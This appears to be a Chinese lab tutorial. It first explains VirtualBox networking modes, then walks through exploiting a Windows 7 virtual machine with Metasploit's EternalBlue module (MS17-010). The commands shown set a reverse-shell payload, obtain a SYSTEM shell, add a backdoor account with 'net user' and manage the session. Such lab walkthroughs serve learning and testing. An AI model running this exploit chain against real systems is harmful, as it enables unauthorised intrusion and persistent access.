https://img-blog.csdnimg.cn/2019072517201724.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTA2MDM3OTg=,size_16,color_FFFFFF,t_70

安装完VirtualBox4.0.0后,主机多了一个“VirtualBox Host-Only Network ”本地网卡,IP和DNS是自动获取的,在以后的VBox网络配置中,一般保持默认。

VBox中,可以为同一个虚拟机添加四个网卡,对不同的网卡进行不同模式的设置。比如说,添加两块网卡一块的连接方式为NAT,另一块为Host-only Adapter,这样客户机既可以安全上网,也可以和主机通信。

img

**NAT模式 **VBox默认是NAT(网络地址转换)方式,Guest OS(客户机系统)装好后(联网方式设为DHCP),就可以直接连网。 使用NAT方式,客户机访问网络由主机提供(其实是通过主机的NAT服务器,这是VirtualBox内置的)。在这种方式下,客户机的网络地址外网不可见,因此外网访问不了客户机,而且主机也无法通过网络访问客户机,要想将主机上的一些资料上传到客户机,是做不来的。

测试时,主机IP是10.8.5.24的内网地址,主机下查看VBox的IP,结果如下: img

客户机IP是10.0.2.15的内网地址,网关是10.0.2.2,使用route命令,查看结果如下: img

主机能ping通169.254.134.226,ping不能ping通客户机;客户机ping不通169.254.134.226,但客户机能ping通主机,并而能正常上网。

**桥接模式(Bridged Adapter) **将客户机的网络连接改为桥接方式,然后到虚拟系统中,将IP与主机IP设置在同一网段。此时,客户机相当于网络上的一台独立主机。主机、虚拟机、网络上的其他工作站,可以直接互相访问。如果只允许客户机与主机通信,只须将主机网卡设置双IP,一个用于上网,一个用于与虚拟机通信,而无须修改客户机的网络连接方式。这跟将两台主机设置成同一网段,然后用一根网线相连,就可以通信是一样的。

**内网模式(Internal) **顾名思义就是内部网络模式,虚拟机与外网完全断开,只实现虚拟机于虚拟机之间的内部网络模式。在主机上同时开两台客户机,IP分别设为192.168.1.1和192.168.1.2(掩码都为255.255.255.0,网关不设),可以正常通信。

**主机模式(Host-only Adapter) **这种模式,据说VBox在主机中模拟出一张专供虚拟机使用的网卡,所有虚拟机都是连接到该网卡上的(主机上的VirtualBox Host-Only Network网卡),可以通过这张网卡来实现上网及其他功能。

如果要让VBox的虚拟机可以访问外网,需将主机系统的本地连接设为与VirtualBox Host-Only Network共享。如图所示进行设置后,VirtualBox Host-Only Network的IP地址被自动设置,测试时IP为192.168.137.1,子网掩码为255.255.255.0。 img

在客户机中将IP设为同一网段的地址,并将DNS地址设为主机所用的DNS地址。理论上,这时客户机与主机、网络上的其他工作站都可以连接的,但实际测试中,(重新激活的网卡,又重启了客户机),客户机只能与主机通信,而且只是在192.168.137.0这个网段内进行通信。

官网

1
2
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run 
chmod +x metasploit-latest-linux-x64-installer.run

学习视频

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
msfconsole
# 进入终端交互
:<<EOF

       =[ metasploit v6.1.7-dev                           ]
+ -- --=[ 2167 exploits - 1148 auxiliary - 368 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all
available commands


EOF

注: win7 是 2009年发布的

先用 metasploit 验证漏洞

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
 use auxiliary/scanner/smb/smb_ms17_010
 show options
 # 首先 ,我们设置 win主机地址
 
 set rhosts  
 
 run
 
 :<<EOF
 
[+] 192.168.56.101:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[*] 192.168.56.101:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 
 EOF
 
 # 然后这边就可以扫出漏洞了,注意关闭 win7防火墙
 
 
 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 use exploit/windows/smb/ms17_010_eternalblue
 set rhosts 192.168.1.101
 show targets
 show options
 # 这里要设置payloads ,获取权限
 
  search windows/x64/shell
  # 查看用哪个payloads
  :<<NOTE
  
   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   exploit/windows/fileformat/vlc_mkv            2018-05-24       great   No     VLC Media Player MKV Use After Free
   1   payload/windows/x64/shell_bind_tcp                             normal  No     Windows x64 Command Shell, Bind TCP Inline
   2   payload/windows/x64/shell/bind_tcp_rc4                         normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   3   payload/windows/x64/shell/bind_tcp_uuid                        normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   4   payload/windows/x64/shell_reverse_tcp                          normal  No     Windows x64 Command Shell, Reverse TCP Inline
   5   payload/windows/x64/shell/reverse_tcp_rc4                      normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   6   payload/windows/x64/shell/reverse_tcp_uuid                     normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   7   payload/windows/x64/shell/bind_named_pipe                      normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   8   payload/windows/x64/shell/bind_tcp                             normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   9   payload/windows/x64/shell/bind_ipv6_tcp                        normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   10  payload/windows/x64/shell/bind_ipv6_tcp_uuid                   normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   11  payload/windows/x64/shell/reverse_tcp                          normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager

  
  NOTE
 
 set payload payload/windows/x64/shell_reverse_tcp
  
 
# 调用run
# run 之后 直接可以入侵他的机器了
run

输入 shell 就能 进入windows 后台了

入侵到 win7后 添加账户

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
net user lyr KING /add
# 添加 一个 lyr 的用户, king  为密码
# 因为 系统编码不一样,会乱码
chcp 65001

net user
# 这个可以查看用户

:<<NOTE
C:\Windows\system32>whoami
whoami
nt authority\system
# 最高权限
NOTE

ctrl + c # 断开这个 网络的连接 session 会话

image-20211001172448369

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
exploit -j
:<<EOF
192.168.56.101:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
EOF

# 渗透完目标之后 保存到这个后台
# 这个类似nohup 一样, 可以调用 sessions查看
sessions
# 可以看到有个连接了
sessions -i 1